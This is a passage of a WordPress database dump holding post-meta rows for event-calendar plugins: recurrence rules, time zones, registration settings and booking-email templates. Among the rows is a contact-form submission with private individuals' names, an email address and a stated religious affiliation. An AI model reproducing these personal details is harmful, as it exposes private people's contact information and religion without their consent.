10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630422;s:12:\"_dp_original\";i:1610630422;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630422;s:16:\"tribe_events_cat\";i:1610655622;}'),(125549,263332,'_EventCurrencyPosition','prefix'),(125550,263332,'_EventCost',''),(125551,263332,'_EventURL',''),(125552,263332,'_EventTimezone','America/Denver'),(125553,263332,'_dp_original','263319'),(125554,263332,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125535,263332,'_EventOrigin','events-calendar'),(124943,263333,'_EventEndDateUTC','2021-10-12 02:30:00'),(124944,263333,'_EventDuration','5400'),(125556,263333,'protect_children',''),(125557,263333,'protect_children',''),(125558,263333,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630422;s:12:\"_EventOrigin\";i:1610630422;s:13:\"_thumbnail_id\";i:1610630422;s:26:\"_RTECregistrationsDisabled\";i:1610630422;s:17:\"_RTECdeadlineType\";i:1610630422;s:19:\"_RTECwhoCanRegister\";i:1610630422;s:23:\"_RTEClimitRegistrations\";i:1610630422;s:21:\"_RTECmaxRegistrations\";i:1610630422;s:24:\"boldgrid_hide_page_title\";i:1610630422;s:16:\"_EventRecurrence\";i:1610630422;s:17:\"_EventShowMapLink\";i:1610630422;s:13:\"_EventShowMap\";i:1610630422;s:13:\"_EventVenueID\";i:1610630422;s:20:\"_EventCurrencySymbol\";i:1610630422;s:22:\"_EventCurrencyPosition\";i:1610630422;s:10:\"_EventCost\";i:1610630422;s:9:\"_EventURL\";i:1610630422;s:14:\"_EventTimezone\";i:1610630422;s:12:\"_dp_original\";i:1610630422;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630422;s:16:\"tribe_events_cat\";i:1610655622;}'),(125570,263333,'_EventShowMapLink','1'),(125571,263333,'_EventShowMap','1'),(125572,263333,'_EventVenueID','262507'),(125573,263333,'_EventCurrencySymbol',''),(125574,263333,'_EventCurrencyPosition','prefix'),(125575,263333,'_EventCost',''),(125576,263333,'_EventURL',''),(125577,263333,'_EventTimezone','America/Denver'),(125578,263333,'_dp_original','263319'),(125579,263333,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:2:{i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125580,263334,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630423;s:12:\"_EventOrigin\";i:1610630423;s:13:\"_thumbnail_id\";i:1610630423;s:26:\"_RTECregistrationsDisabled\";i:1610630423;s:17:\"_RTECdeadlineType\";i:1610630423;s:19:\"_RTECwhoCanRegister\";i:1610630423;s:23:\"_RTEClimitRegistrations\";i:1610630423;s:21:\"_RTECmaxRegistrations\";i:1610630423;s:24:\"boldgrid_hide_page_title\";i:1610630423;s:16:\"_EventRecurrence\";i:1610630423;s:17:\"_EventShowMapLink\";i:1610630423;s:13:\"_EventShowMap\";i:1610630423;s:13:\"_EventVenueID\";i:1610630423;s:20:\"_EventCurrencySymbol\";i:1610630423;s:22:\"_EventCurrencyPosition\";i:1610630423;s:10:\"_EventCost\";i:1610630423;s:9:\"_EventURL\";i:1610630423;s:14:\"_EventTimezone\";i:1610630423;s:12:\"_dp_original\";i:1610630423;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630423;s:16:\"tribe_events_cat\";i:1610655623;}'),(125559,263333,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630422;s:12:\"_EventOrigin\";i:1610630422;s:13:\"_thumbnail_id\";i:1610630422;s:26:\"_RTECregistrationsDisabled\";i:1610630422;s:17:\"_RTECdeadlineType\";i:1610630422;s:19:\"_RTECwhoCanRegister\";i:1610630422;s:23:\"_RTEClimitRegistrations\";i:1610630422;s:21:\"_RTECmaxRegistrations\";i:1610630422;s:24:\"boldgrid_hide_page_title\";i:1610630422;s:16:\"_EventRecurrence\";i:1610630422;s:17:\"_EventShowMapLink\";i:1610630422;s:13:\"_EventShowMap\";i:1610630422;s:13:\"_EventVenueID\";i:1610630422;s:20:\"_EventCurrencySymbol\";i:1610630422;s:22:\"_EventCurrencyPosition\";i:1610630422;s:10:\"_EventCost\";i:1610630422;s:9:\"_EventURL\";i:1610630422;s:14:\"_EventTimezone\";i:1610630422;s:12:\"_dp_original\";i:1610630422;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630422;s:16:\"tribe_events_cat\";i:1610655622;}'),(125613,263349,'_RTECdeadlineType','start'),(125614,263349,'_RTECwhoCanRegister','any'),(125560,263333,'_EventOrigin','events-calendar'),(125561,263333,'_EventOrigin','events-calendar'),(125563,263333,'_RTECregistrationsDisabled','1'),(125564,263333,'_RTECdeadlineType','start'),(125565,263333,'_RTECwhoCanRegister','any'),(125555,263333,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630422;s:12:\"_EventOrigin\";i:1610630422;s:13:\"_thumbnail_id\";i:1610630422;s:26:\"_RTECregistrationsDisabled\";i:1610630422;s:17:\"_RTECdeadlineType\";i:1610630422;s:19:\"_RTECwhoCanRegister\";i:1610630422;s:23:\"_RTEClimitRegistrations\";i:1610630422;s:21:\"_RTECmaxRegistrations\";i:1610630422;s:24:\"boldgrid_hide_page_title\";i:1610630422;s:16:\"_EventRecurrence\";i:1610630422;s:17:\"_EventShowMapLink\";i:1610630422;s:13:\"_EventShowMap\";i:1610630422;s:13:\"_EventVenueID\";i:1610630422;s:20:\"_EventCurrencySymbol\";i:1610630422;s:22:\"_EventCurrencyPosition\";i:1610630422;s:10:\"_EventCost\";i:1610630422;s:9:\"_EventURL\";i:1610630422;s:14:\"_EventTimezone\";i:1610630422;s:12:\"_dp_original\";i:1610630422;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630422;s:16:\"tribe_events_cat\";i:1610655622;}'),(125566,263333,'_RTEClimitRegistrations','0'),(125567,263333,'_RTECmaxRegistrations','30'),(125568,263333,'boldgrid_hide_page_title','0'),(125569,263333,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(124973,263334,'_EventStartDate','2021-11-08 19:00:00'),(124974,263334,'_EventStartDateUTC','2021-11-09 02:00:00'),(124975,263334,'_EventEndDate','2021-11-08 20:30:00'),(124976,263334,'_EventEndDateUTC','2021-11-09 03:30:00'),(124977,263334,'_EventDuration','5400'),(129340,263592,'_EventDuration','3600'),(129920,263592,'_EventShowMapLink','1'),(129921,263592,'_EventShowMap','1'),(129787,263610,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1611953228;s:12:\"_EventOrigin\";i:1611953228;s:13:\"_thumbnail_id\";i:1611953228;s:26:\"_RTECregistrationsDisabled\";i:1611953228;s:17:\"_RTECdeadlineType\";i:1611953228;s:19:\"_RTECwhoCanRegister\";i:1611953228;s:23:\"_RTEClimitRegistrations\";i:1611953228;s:21:\"_RTECmaxRegistrations\";i:1611953228;s:24:\"boldgrid_hide_page_title\";i:1611953228;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953228;s:13:\"_EventShowMap\";i:1611953228;s:13:\"_EventVenueID\";i:1611953472;s:15:\"_EventStartDate\";i:1611953472;s:13:\"_EventEndDate\";i:1611953472;s:18:\"_EventStartDateUTC\";i:1611953472;s:16:\"_EventEndDateUTC\";i:1611953472;s:14:\"_EventDuration\";i:1611953472;s:20:\"_EventCurrencySymbol\";i:1611953228;s:22:\"_EventCurrencyPosition\";i:1611953228;s:10:\"_EventCost\";i:1611953228;s:9:\"_EventURL\";i:1611953228;s:14:\"_EventTimezone\";i:1611953228;s:18:\"_EventTimezoneAbbr\";i:1611953228;s:12:\"_dp_original\";i:1611953228;s:10:\"_edit_last\";i:1611953299;s:10:\"post_title\";i:1611953519;s:12:\"post_content\";i:1611953784;s:16:\"tribe_events_cat\";i:1611978671;s:11:\"post_status\";i:1611953471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(129906,263592,'protect_children',''),(129907,263592,'protect_children',''),(129908,263592,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(151780,266078,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(129913,263592,'_RTECregistrationsDisabled','1'),(129914,263592,'_RTECdeadlineType','start'),(129915,263592,'_RTECwhoCanRegister','any'),(129916,263592,'_RTEClimitRegistrations','0'),(129917,263592,'_RTECmaxRegistrations','30'),(129918,263592,'boldgrid_hide_page_title','0'),(129919,263592,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129909,263592,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(129911,263592,'_EventOrigin','events-calendar'),(129910,263592,'_EventOrigin','events-calendar'),(125617,263349,'boldgrid_hide_page_title','0'),(125595,263334,'_EventShowMapLink','1'),(125596,263334,'_EventShowMap','1'),(125597,263334,'_EventVenueID','262507'),(125598,263334,'_EventCurrencySymbol',''),(125599,263334,'_EventCurrencyPosition','prefix'),(125600,263334,'_EventCost',''),(125601,263334,'_EventURL',''),(125602,263334,'_EventTimezone','America/Denver'),(125603,263334,'_dp_original','263319'),(125604,263334,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:2:{i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125609,263349,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610630517;s:12:\"_EventOrigin\";i:1610630517;s:13:\"_thumbnail_id\";i:1610630517;s:26:\"_RTECregistrationsDisabled\";i:1610630517;s:17:\"_RTECdeadlineType\";i:1610630517;s:19:\"_RTECwhoCanRegister\";i:1610630517;s:23:\"_RTEClimitRegistrations\";i:1610630517;s:21:\"_RTECmaxRegistrations\";i:1610630517;s:24:\"boldgrid_hide_page_title\";i:1610630517;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1610630517;s:13:\"_EventShowMap\";i:1610630517;s:13:\"_EventVenueID\";i:1611952622;s:15:\"_EventStartDate\";i:1611952446;s:13:\"_EventEndDate\";i:1611952446;s:18:\"_EventStartDateUTC\";i:1611952446;s:16:\"_EventEndDateUTC\";i:1611952446;s:14:\"_EventDuration\";i:1611952446;s:20:\"_EventCurrencySymbol\";i:1610630517;s:22:\"_EventCurrencyPosition\";i:1610630517;s:10:\"_EventCost\";i:1610630517;s:9:\"_EventURL\";i:1610630517;s:14:\"_EventTimezone\";i:1610630517;s:18:\"_EventTimezoneAbbr\";i:1611952446;s:12:\"_dp_original\";i:1610630517;s:10:\"_edit_last\";i:1610630587;s:10:\"post_title\";i:1611953568;s:12:\"post_content\";i:1611952446;s:16:\"tribe_events_cat\";i:1611977646;s:11:\"post_status\";i:1610630656;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(125612,263349,'_RTECregistrationsDisabled','1'),(125615,263349,'_RTEClimitRegistrations','0'),(125616,263349,'_RTECmaxRegistrations','30'),(125585,263334,'_EventOrigin','events-calendar'),(125592,263334,'_RTECmaxRegistrations','30'),(125593,263334,'boldgrid_hide_page_title','0'),(125594,263334,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(125586,263334,'_EventOrigin','events-calendar'),(125588,263334,'_RTECregistrationsDisabled','1'),(125589,263334,'_RTECdeadlineType','start'),(125590,263334,'_RTECwhoCanRegister','any'),(125584,263334,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630423;s:12:\"_EventOrigin\";i:1610630423;s:13:\"_thumbnail_id\";i:1610630423;s:26:\"_RTECregistrationsDisabled\";i:1610630423;s:17:\"_RTECdeadlineType\";i:1610630423;s:19:\"_RTECwhoCanRegister\";i:1610630423;s:23:\"_RTEClimitRegistrations\";i:1610630423;s:21:\"_RTECmaxRegistrations\";i:1610630423;s:24:\"boldgrid_hide_page_title\";i:1610630423;s:16:\"_EventRecurrence\";i:1610630423;s:17:\"_EventShowMapLink\";i:1610630423;s:13:\"_EventShowMap\";i:1610630423;s:13:\"_EventVenueID\";i:1610630423;s:20:\"_EventCurrencySymbol\";i:1610630423;s:22:\"_EventCurrencyPosition\";i:1610630423;s:10:\"_EventCost\";i:1610630423;s:9:\"_EventURL\";i:1610630423;s:14:\"_EventTimezone\";i:1610630423;s:12:\"_dp_original\";i:1610630423;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630423;s:16:\"tribe_events_cat\";i:1610655623;}'),(125581,263334,'protect_children',''),(125582,263334,'protect_children',''),(125583,263334,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630423;s:12:\"_EventOrigin\";i:1610630423;s:13:\"_thumbnail_id\";i:1610630423;s:26:\"_RTECregistrationsDisabled\";i:1610630423;s:17:\"_RTECdeadlineType\";i:1610630423;s:19:\"_RTECwhoCanRegister\";i:1610630423;s:23:\"_RTEClimitRegistrations\";i:1610630423;s:21:\"_RTECmaxRegistrations\";i:1610630423;s:24:\"boldgrid_hide_page_title\";i:1610630423;s:16:\"_EventRecurrence\";i:1610630423;s:17:\"_EventShowMapLink\";i:1610630423;s:13:\"_EventShowMap\";i:1610630423;s:13:\"_EventVenueID\";i:1610630423;s:20:\"_EventCurrencySymbol\";i:1610630423;s:22:\"_EventCurrencyPosition\";i:1610630423;s:10:\"_EventCost\";i:1610630423;s:9:\"_EventURL\";i:1610630423;s:14:\"_EventTimezone\";i:1610630423;s:12:\"_dp_original\";i:1610630423;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630423;s:16:\"tribe_events_cat\";i:1610655623;}'),(125591,263334,'_RTEClimitRegistrations','0'),(130059,263622,'_EventStartDate','2021-03-16 18:00:00'),(130060,263622,'_EventStartDateUTC','2021-03-17 00:00:00'),(130030,263597,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129980,263595,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(146802,265640,'_field_133','Dave'),(146803,265640,'_field_134','Ogletree'),(146801,265639,'_thumbnail_id','264294'),(129855,263590,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953568;s:12:\"_EventOrigin\";i:1611953568;s:13:\"_thumbnail_id\";i:1611953568;s:26:\"_RTECregistrationsDisabled\";i:1611953568;s:17:\"_RTECdeadlineType\";i:1611953568;s:19:\"_RTECwhoCanRegister\";i:1611953568;s:23:\"_RTEClimitRegistrations\";i:1611953568;s:21:\"_RTECmaxRegistrations\";i:1611953568;s:24:\"boldgrid_hide_page_title\";i:1611953568;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1611953568;s:13:\"_EventShowMap\";i:1611953568;s:20:\"_EventCurrencySymbol\";i:1611953568;s:22:\"_EventCurrencyPosition\";i:1611953568;s:10:\"_EventCost\";i:1611953568;s:9:\"_EventURL\";i:1611953568;s:14:\"_EventTimezone\";i:1611953568;s:12:\"_dp_original\";i:1611953568;s:13:\"_EventVenueID\";i:1611953568;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953568;}'),(146800,265639,'_edit_last','2'),(146799,265639,'_edit_lock','1633645421:2'),(129813,263610,'_edit_last','2'),(146790,265639,'mec_repeat_end_at_occurrences',''),(146791,265639,'mec_repeat_end',''),(146792,265639,'mec_repeat_interval','1'),(146793,265639,'mec_allday','0'),(146794,265639,'mec_certain_weekdays','a:0:{}'),(146795,265639,'mec_dont_show_map','0'),(146796,265639,'mec_location_id','118'),(146797,265639,'mec_color',''),(146798,265639,'protect_children',''),(129812,263610,'_edit_lock','1619293415:2'),(129811,263610,'_dp_original','263319'),(129810,263610,'_EventTimezoneAbbr','MST'),(129809,263610,'_EventTimezone','America/Denver'),(129803,263610,'_EventEndDateUTC','2021-02-17 02:00:00'),(129804,263610,'_EventDuration','3600'),(129805,263610,'_EventCurrencySymbol',''),(129806,263610,'_EventCurrencyPosition','prefix'),(129807,263610,'_EventCost',''),(129808,263610,'_EventURL',''),(129797,263610,'_EventShowMapLink','1'),(129798,263610,'_EventShowMap','1'),(129827,263610,'_EventVenueID','263589'),(129800,263610,'_EventStartDate','2021-02-16 18:00:00'),(129801,263610,'_EventEndDate','2021-02-16 19:00:00'),(129802,263610,'_EventStartDateUTC','2021-02-17 01:00:00'),(130036,263597,'_EventOrigin','events-calendar'),(151777,266078,'mec_cancelled_reason',''),(130038,263597,'_RTECregistrationsDisabled','1'),(130039,263597,'_RTECdeadlineType','start'),(130040,263597,'_RTECwhoCanRegister','any'),(130041,263597,'_RTEClimitRegistrations','0'),(130034,263597,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(131854,263785,'_seq_num','65'),(131852,263785,'_field_138','I am an Eckist who has recently moved to Longmont Co. Please include me on your email list. Thank you, Marie'),(131853,263785,'_form_id','13'),(131848,263785,'_field_133','Marie'),(131849,263785,'_field_134','Bujol'),(131850,263785,'_field_135','mbujol@icloud.com'),(131851,263785,'_field_137','New in area'),(129739,263608,'protect_children',''),(129740,263608,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1611952937;s:12:\"_EventOrigin\";i:1611952937;s:13:\"_thumbnail_id\";i:1611952937;s:26:\"_RTECregistrationsDisabled\";i:1611952937;s:17:\"_RTECdeadlineType\";i:1611952937;s:19:\"_RTECwhoCanRegister\";i:1611952937;s:23:\"_RTEClimitRegistrations\";i:1611952937;s:21:\"_RTECmaxRegistrations\";i:1611952937;s:24:\"boldgrid_hide_page_title\";i:1611952937;s:16:\"_EventRecurrence\";i:1611953113;s:17:\"_EventShowMapLink\";i:1611952937;s:13:\"_EventShowMap\";i:1611952937;s:13:\"_EventVenueID\";i:1611952937;s:15:\"_EventStartDate\";i:1611953113;s:13:\"_EventEndDate\";i:1611953113;s:18:\"_EventStartDateUTC\";i:1611953113;s:16:\"_EventEndDateUTC\";i:1611953113;s:14:\"_EventDuration\";i:1611953113;s:20:\"_EventCurrencySymbol\";i:1611952937;s:22:\"_EventCurrencyPosition\";i:1611952937;s:10:\"_EventCost\";i:1611952937;s:9:\"_EventURL\";i:1611952937;s:14:\"_EventTimezone\";i:1611952937;s:18:\"_EventTimezoneAbbr\";i:1611953113;s:12:\"_dp_original\";i:1611952937;s:10:\"_edit_last\";i:1611953016;s:10:\"post_title\";i:1611953016;s:12:\"post_content\";i:1611953113;s:16:\"tribe_events_cat\";i:1611978313;s:11:\"post_status\";i:1611953113;}'),(129741,263608,'_EventOrigin','events-calendar'),(129742,263608,'protect_children',''),(129743,263608,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1611952937;s:12:\"_EventOrigin\";i:1611952937;s:13:\"_thumbnail_id\";i:1611952937;s:26:\"_RTECregistrationsDisabled\";i:1611952937;s:17:\"_RTECdeadlineType\";i:1611952937;s:19:\"_RTECwhoCanRegister\";i:1611952937;s:23:\"_RTEClimitRegistrations\";i:1611952937;s:21:\"_RTECmaxRegistrations\";i:1611952937;s:24:\"boldgrid_hide_page_title\";i:1611952937;s:16:\"_EventRecurrence\";i:1611953113;s:17:\"_EventShowMapLink\";i:1611952937;s:13:\"_EventShowMap\";i:1611952937;s:13:\"_EventVenueID\";i:1611952937;s:15:\"_EventStartDate\";i:1611953113;s:13:\"_EventEndDate\";i:1611953113;s:18:\"_EventStartDateUTC\";i:1611953113;s:16:\"_EventEndDateUTC\";i:1611953113;s:14:\"_EventDuration\";i:1611953113;s:20:\"_EventCurrencySymbol\";i:1611952937;s:22:\"_EventCurrencyPosition\";i:1611952937;s:10:\"_EventCost\";i:1611952937;s:9:\"_EventURL\";i:1611952937;s:14:\"_EventTimezone\";i:1611952937;s:18:\"_EventTimezoneAbbr\";i:1611953113;s:12:\"_dp_original\";i:1611952937;s:10:\"_edit_last\";i:1611953016;s:10:\"post_title\";i:1611953016;s:12:\"post_content\";i:1611953113;s:16:\"tribe_events_cat\";i:1611978313;s:11:\"post_status\";i:1611953113;}'),(129746,263608,'_RTECregistrationsDisabled','1'),(129747,263608,'_RTECdeadlineType','start'),(129748,263608,'_RTECwhoCanRegister','any'),(129749,263608,'_RTEClimitRegistrations','0'),(129750,263608,'_RTECmaxRegistrations','30'),(129744,263608,'_EventOrigin','events-calendar'),(129751,26360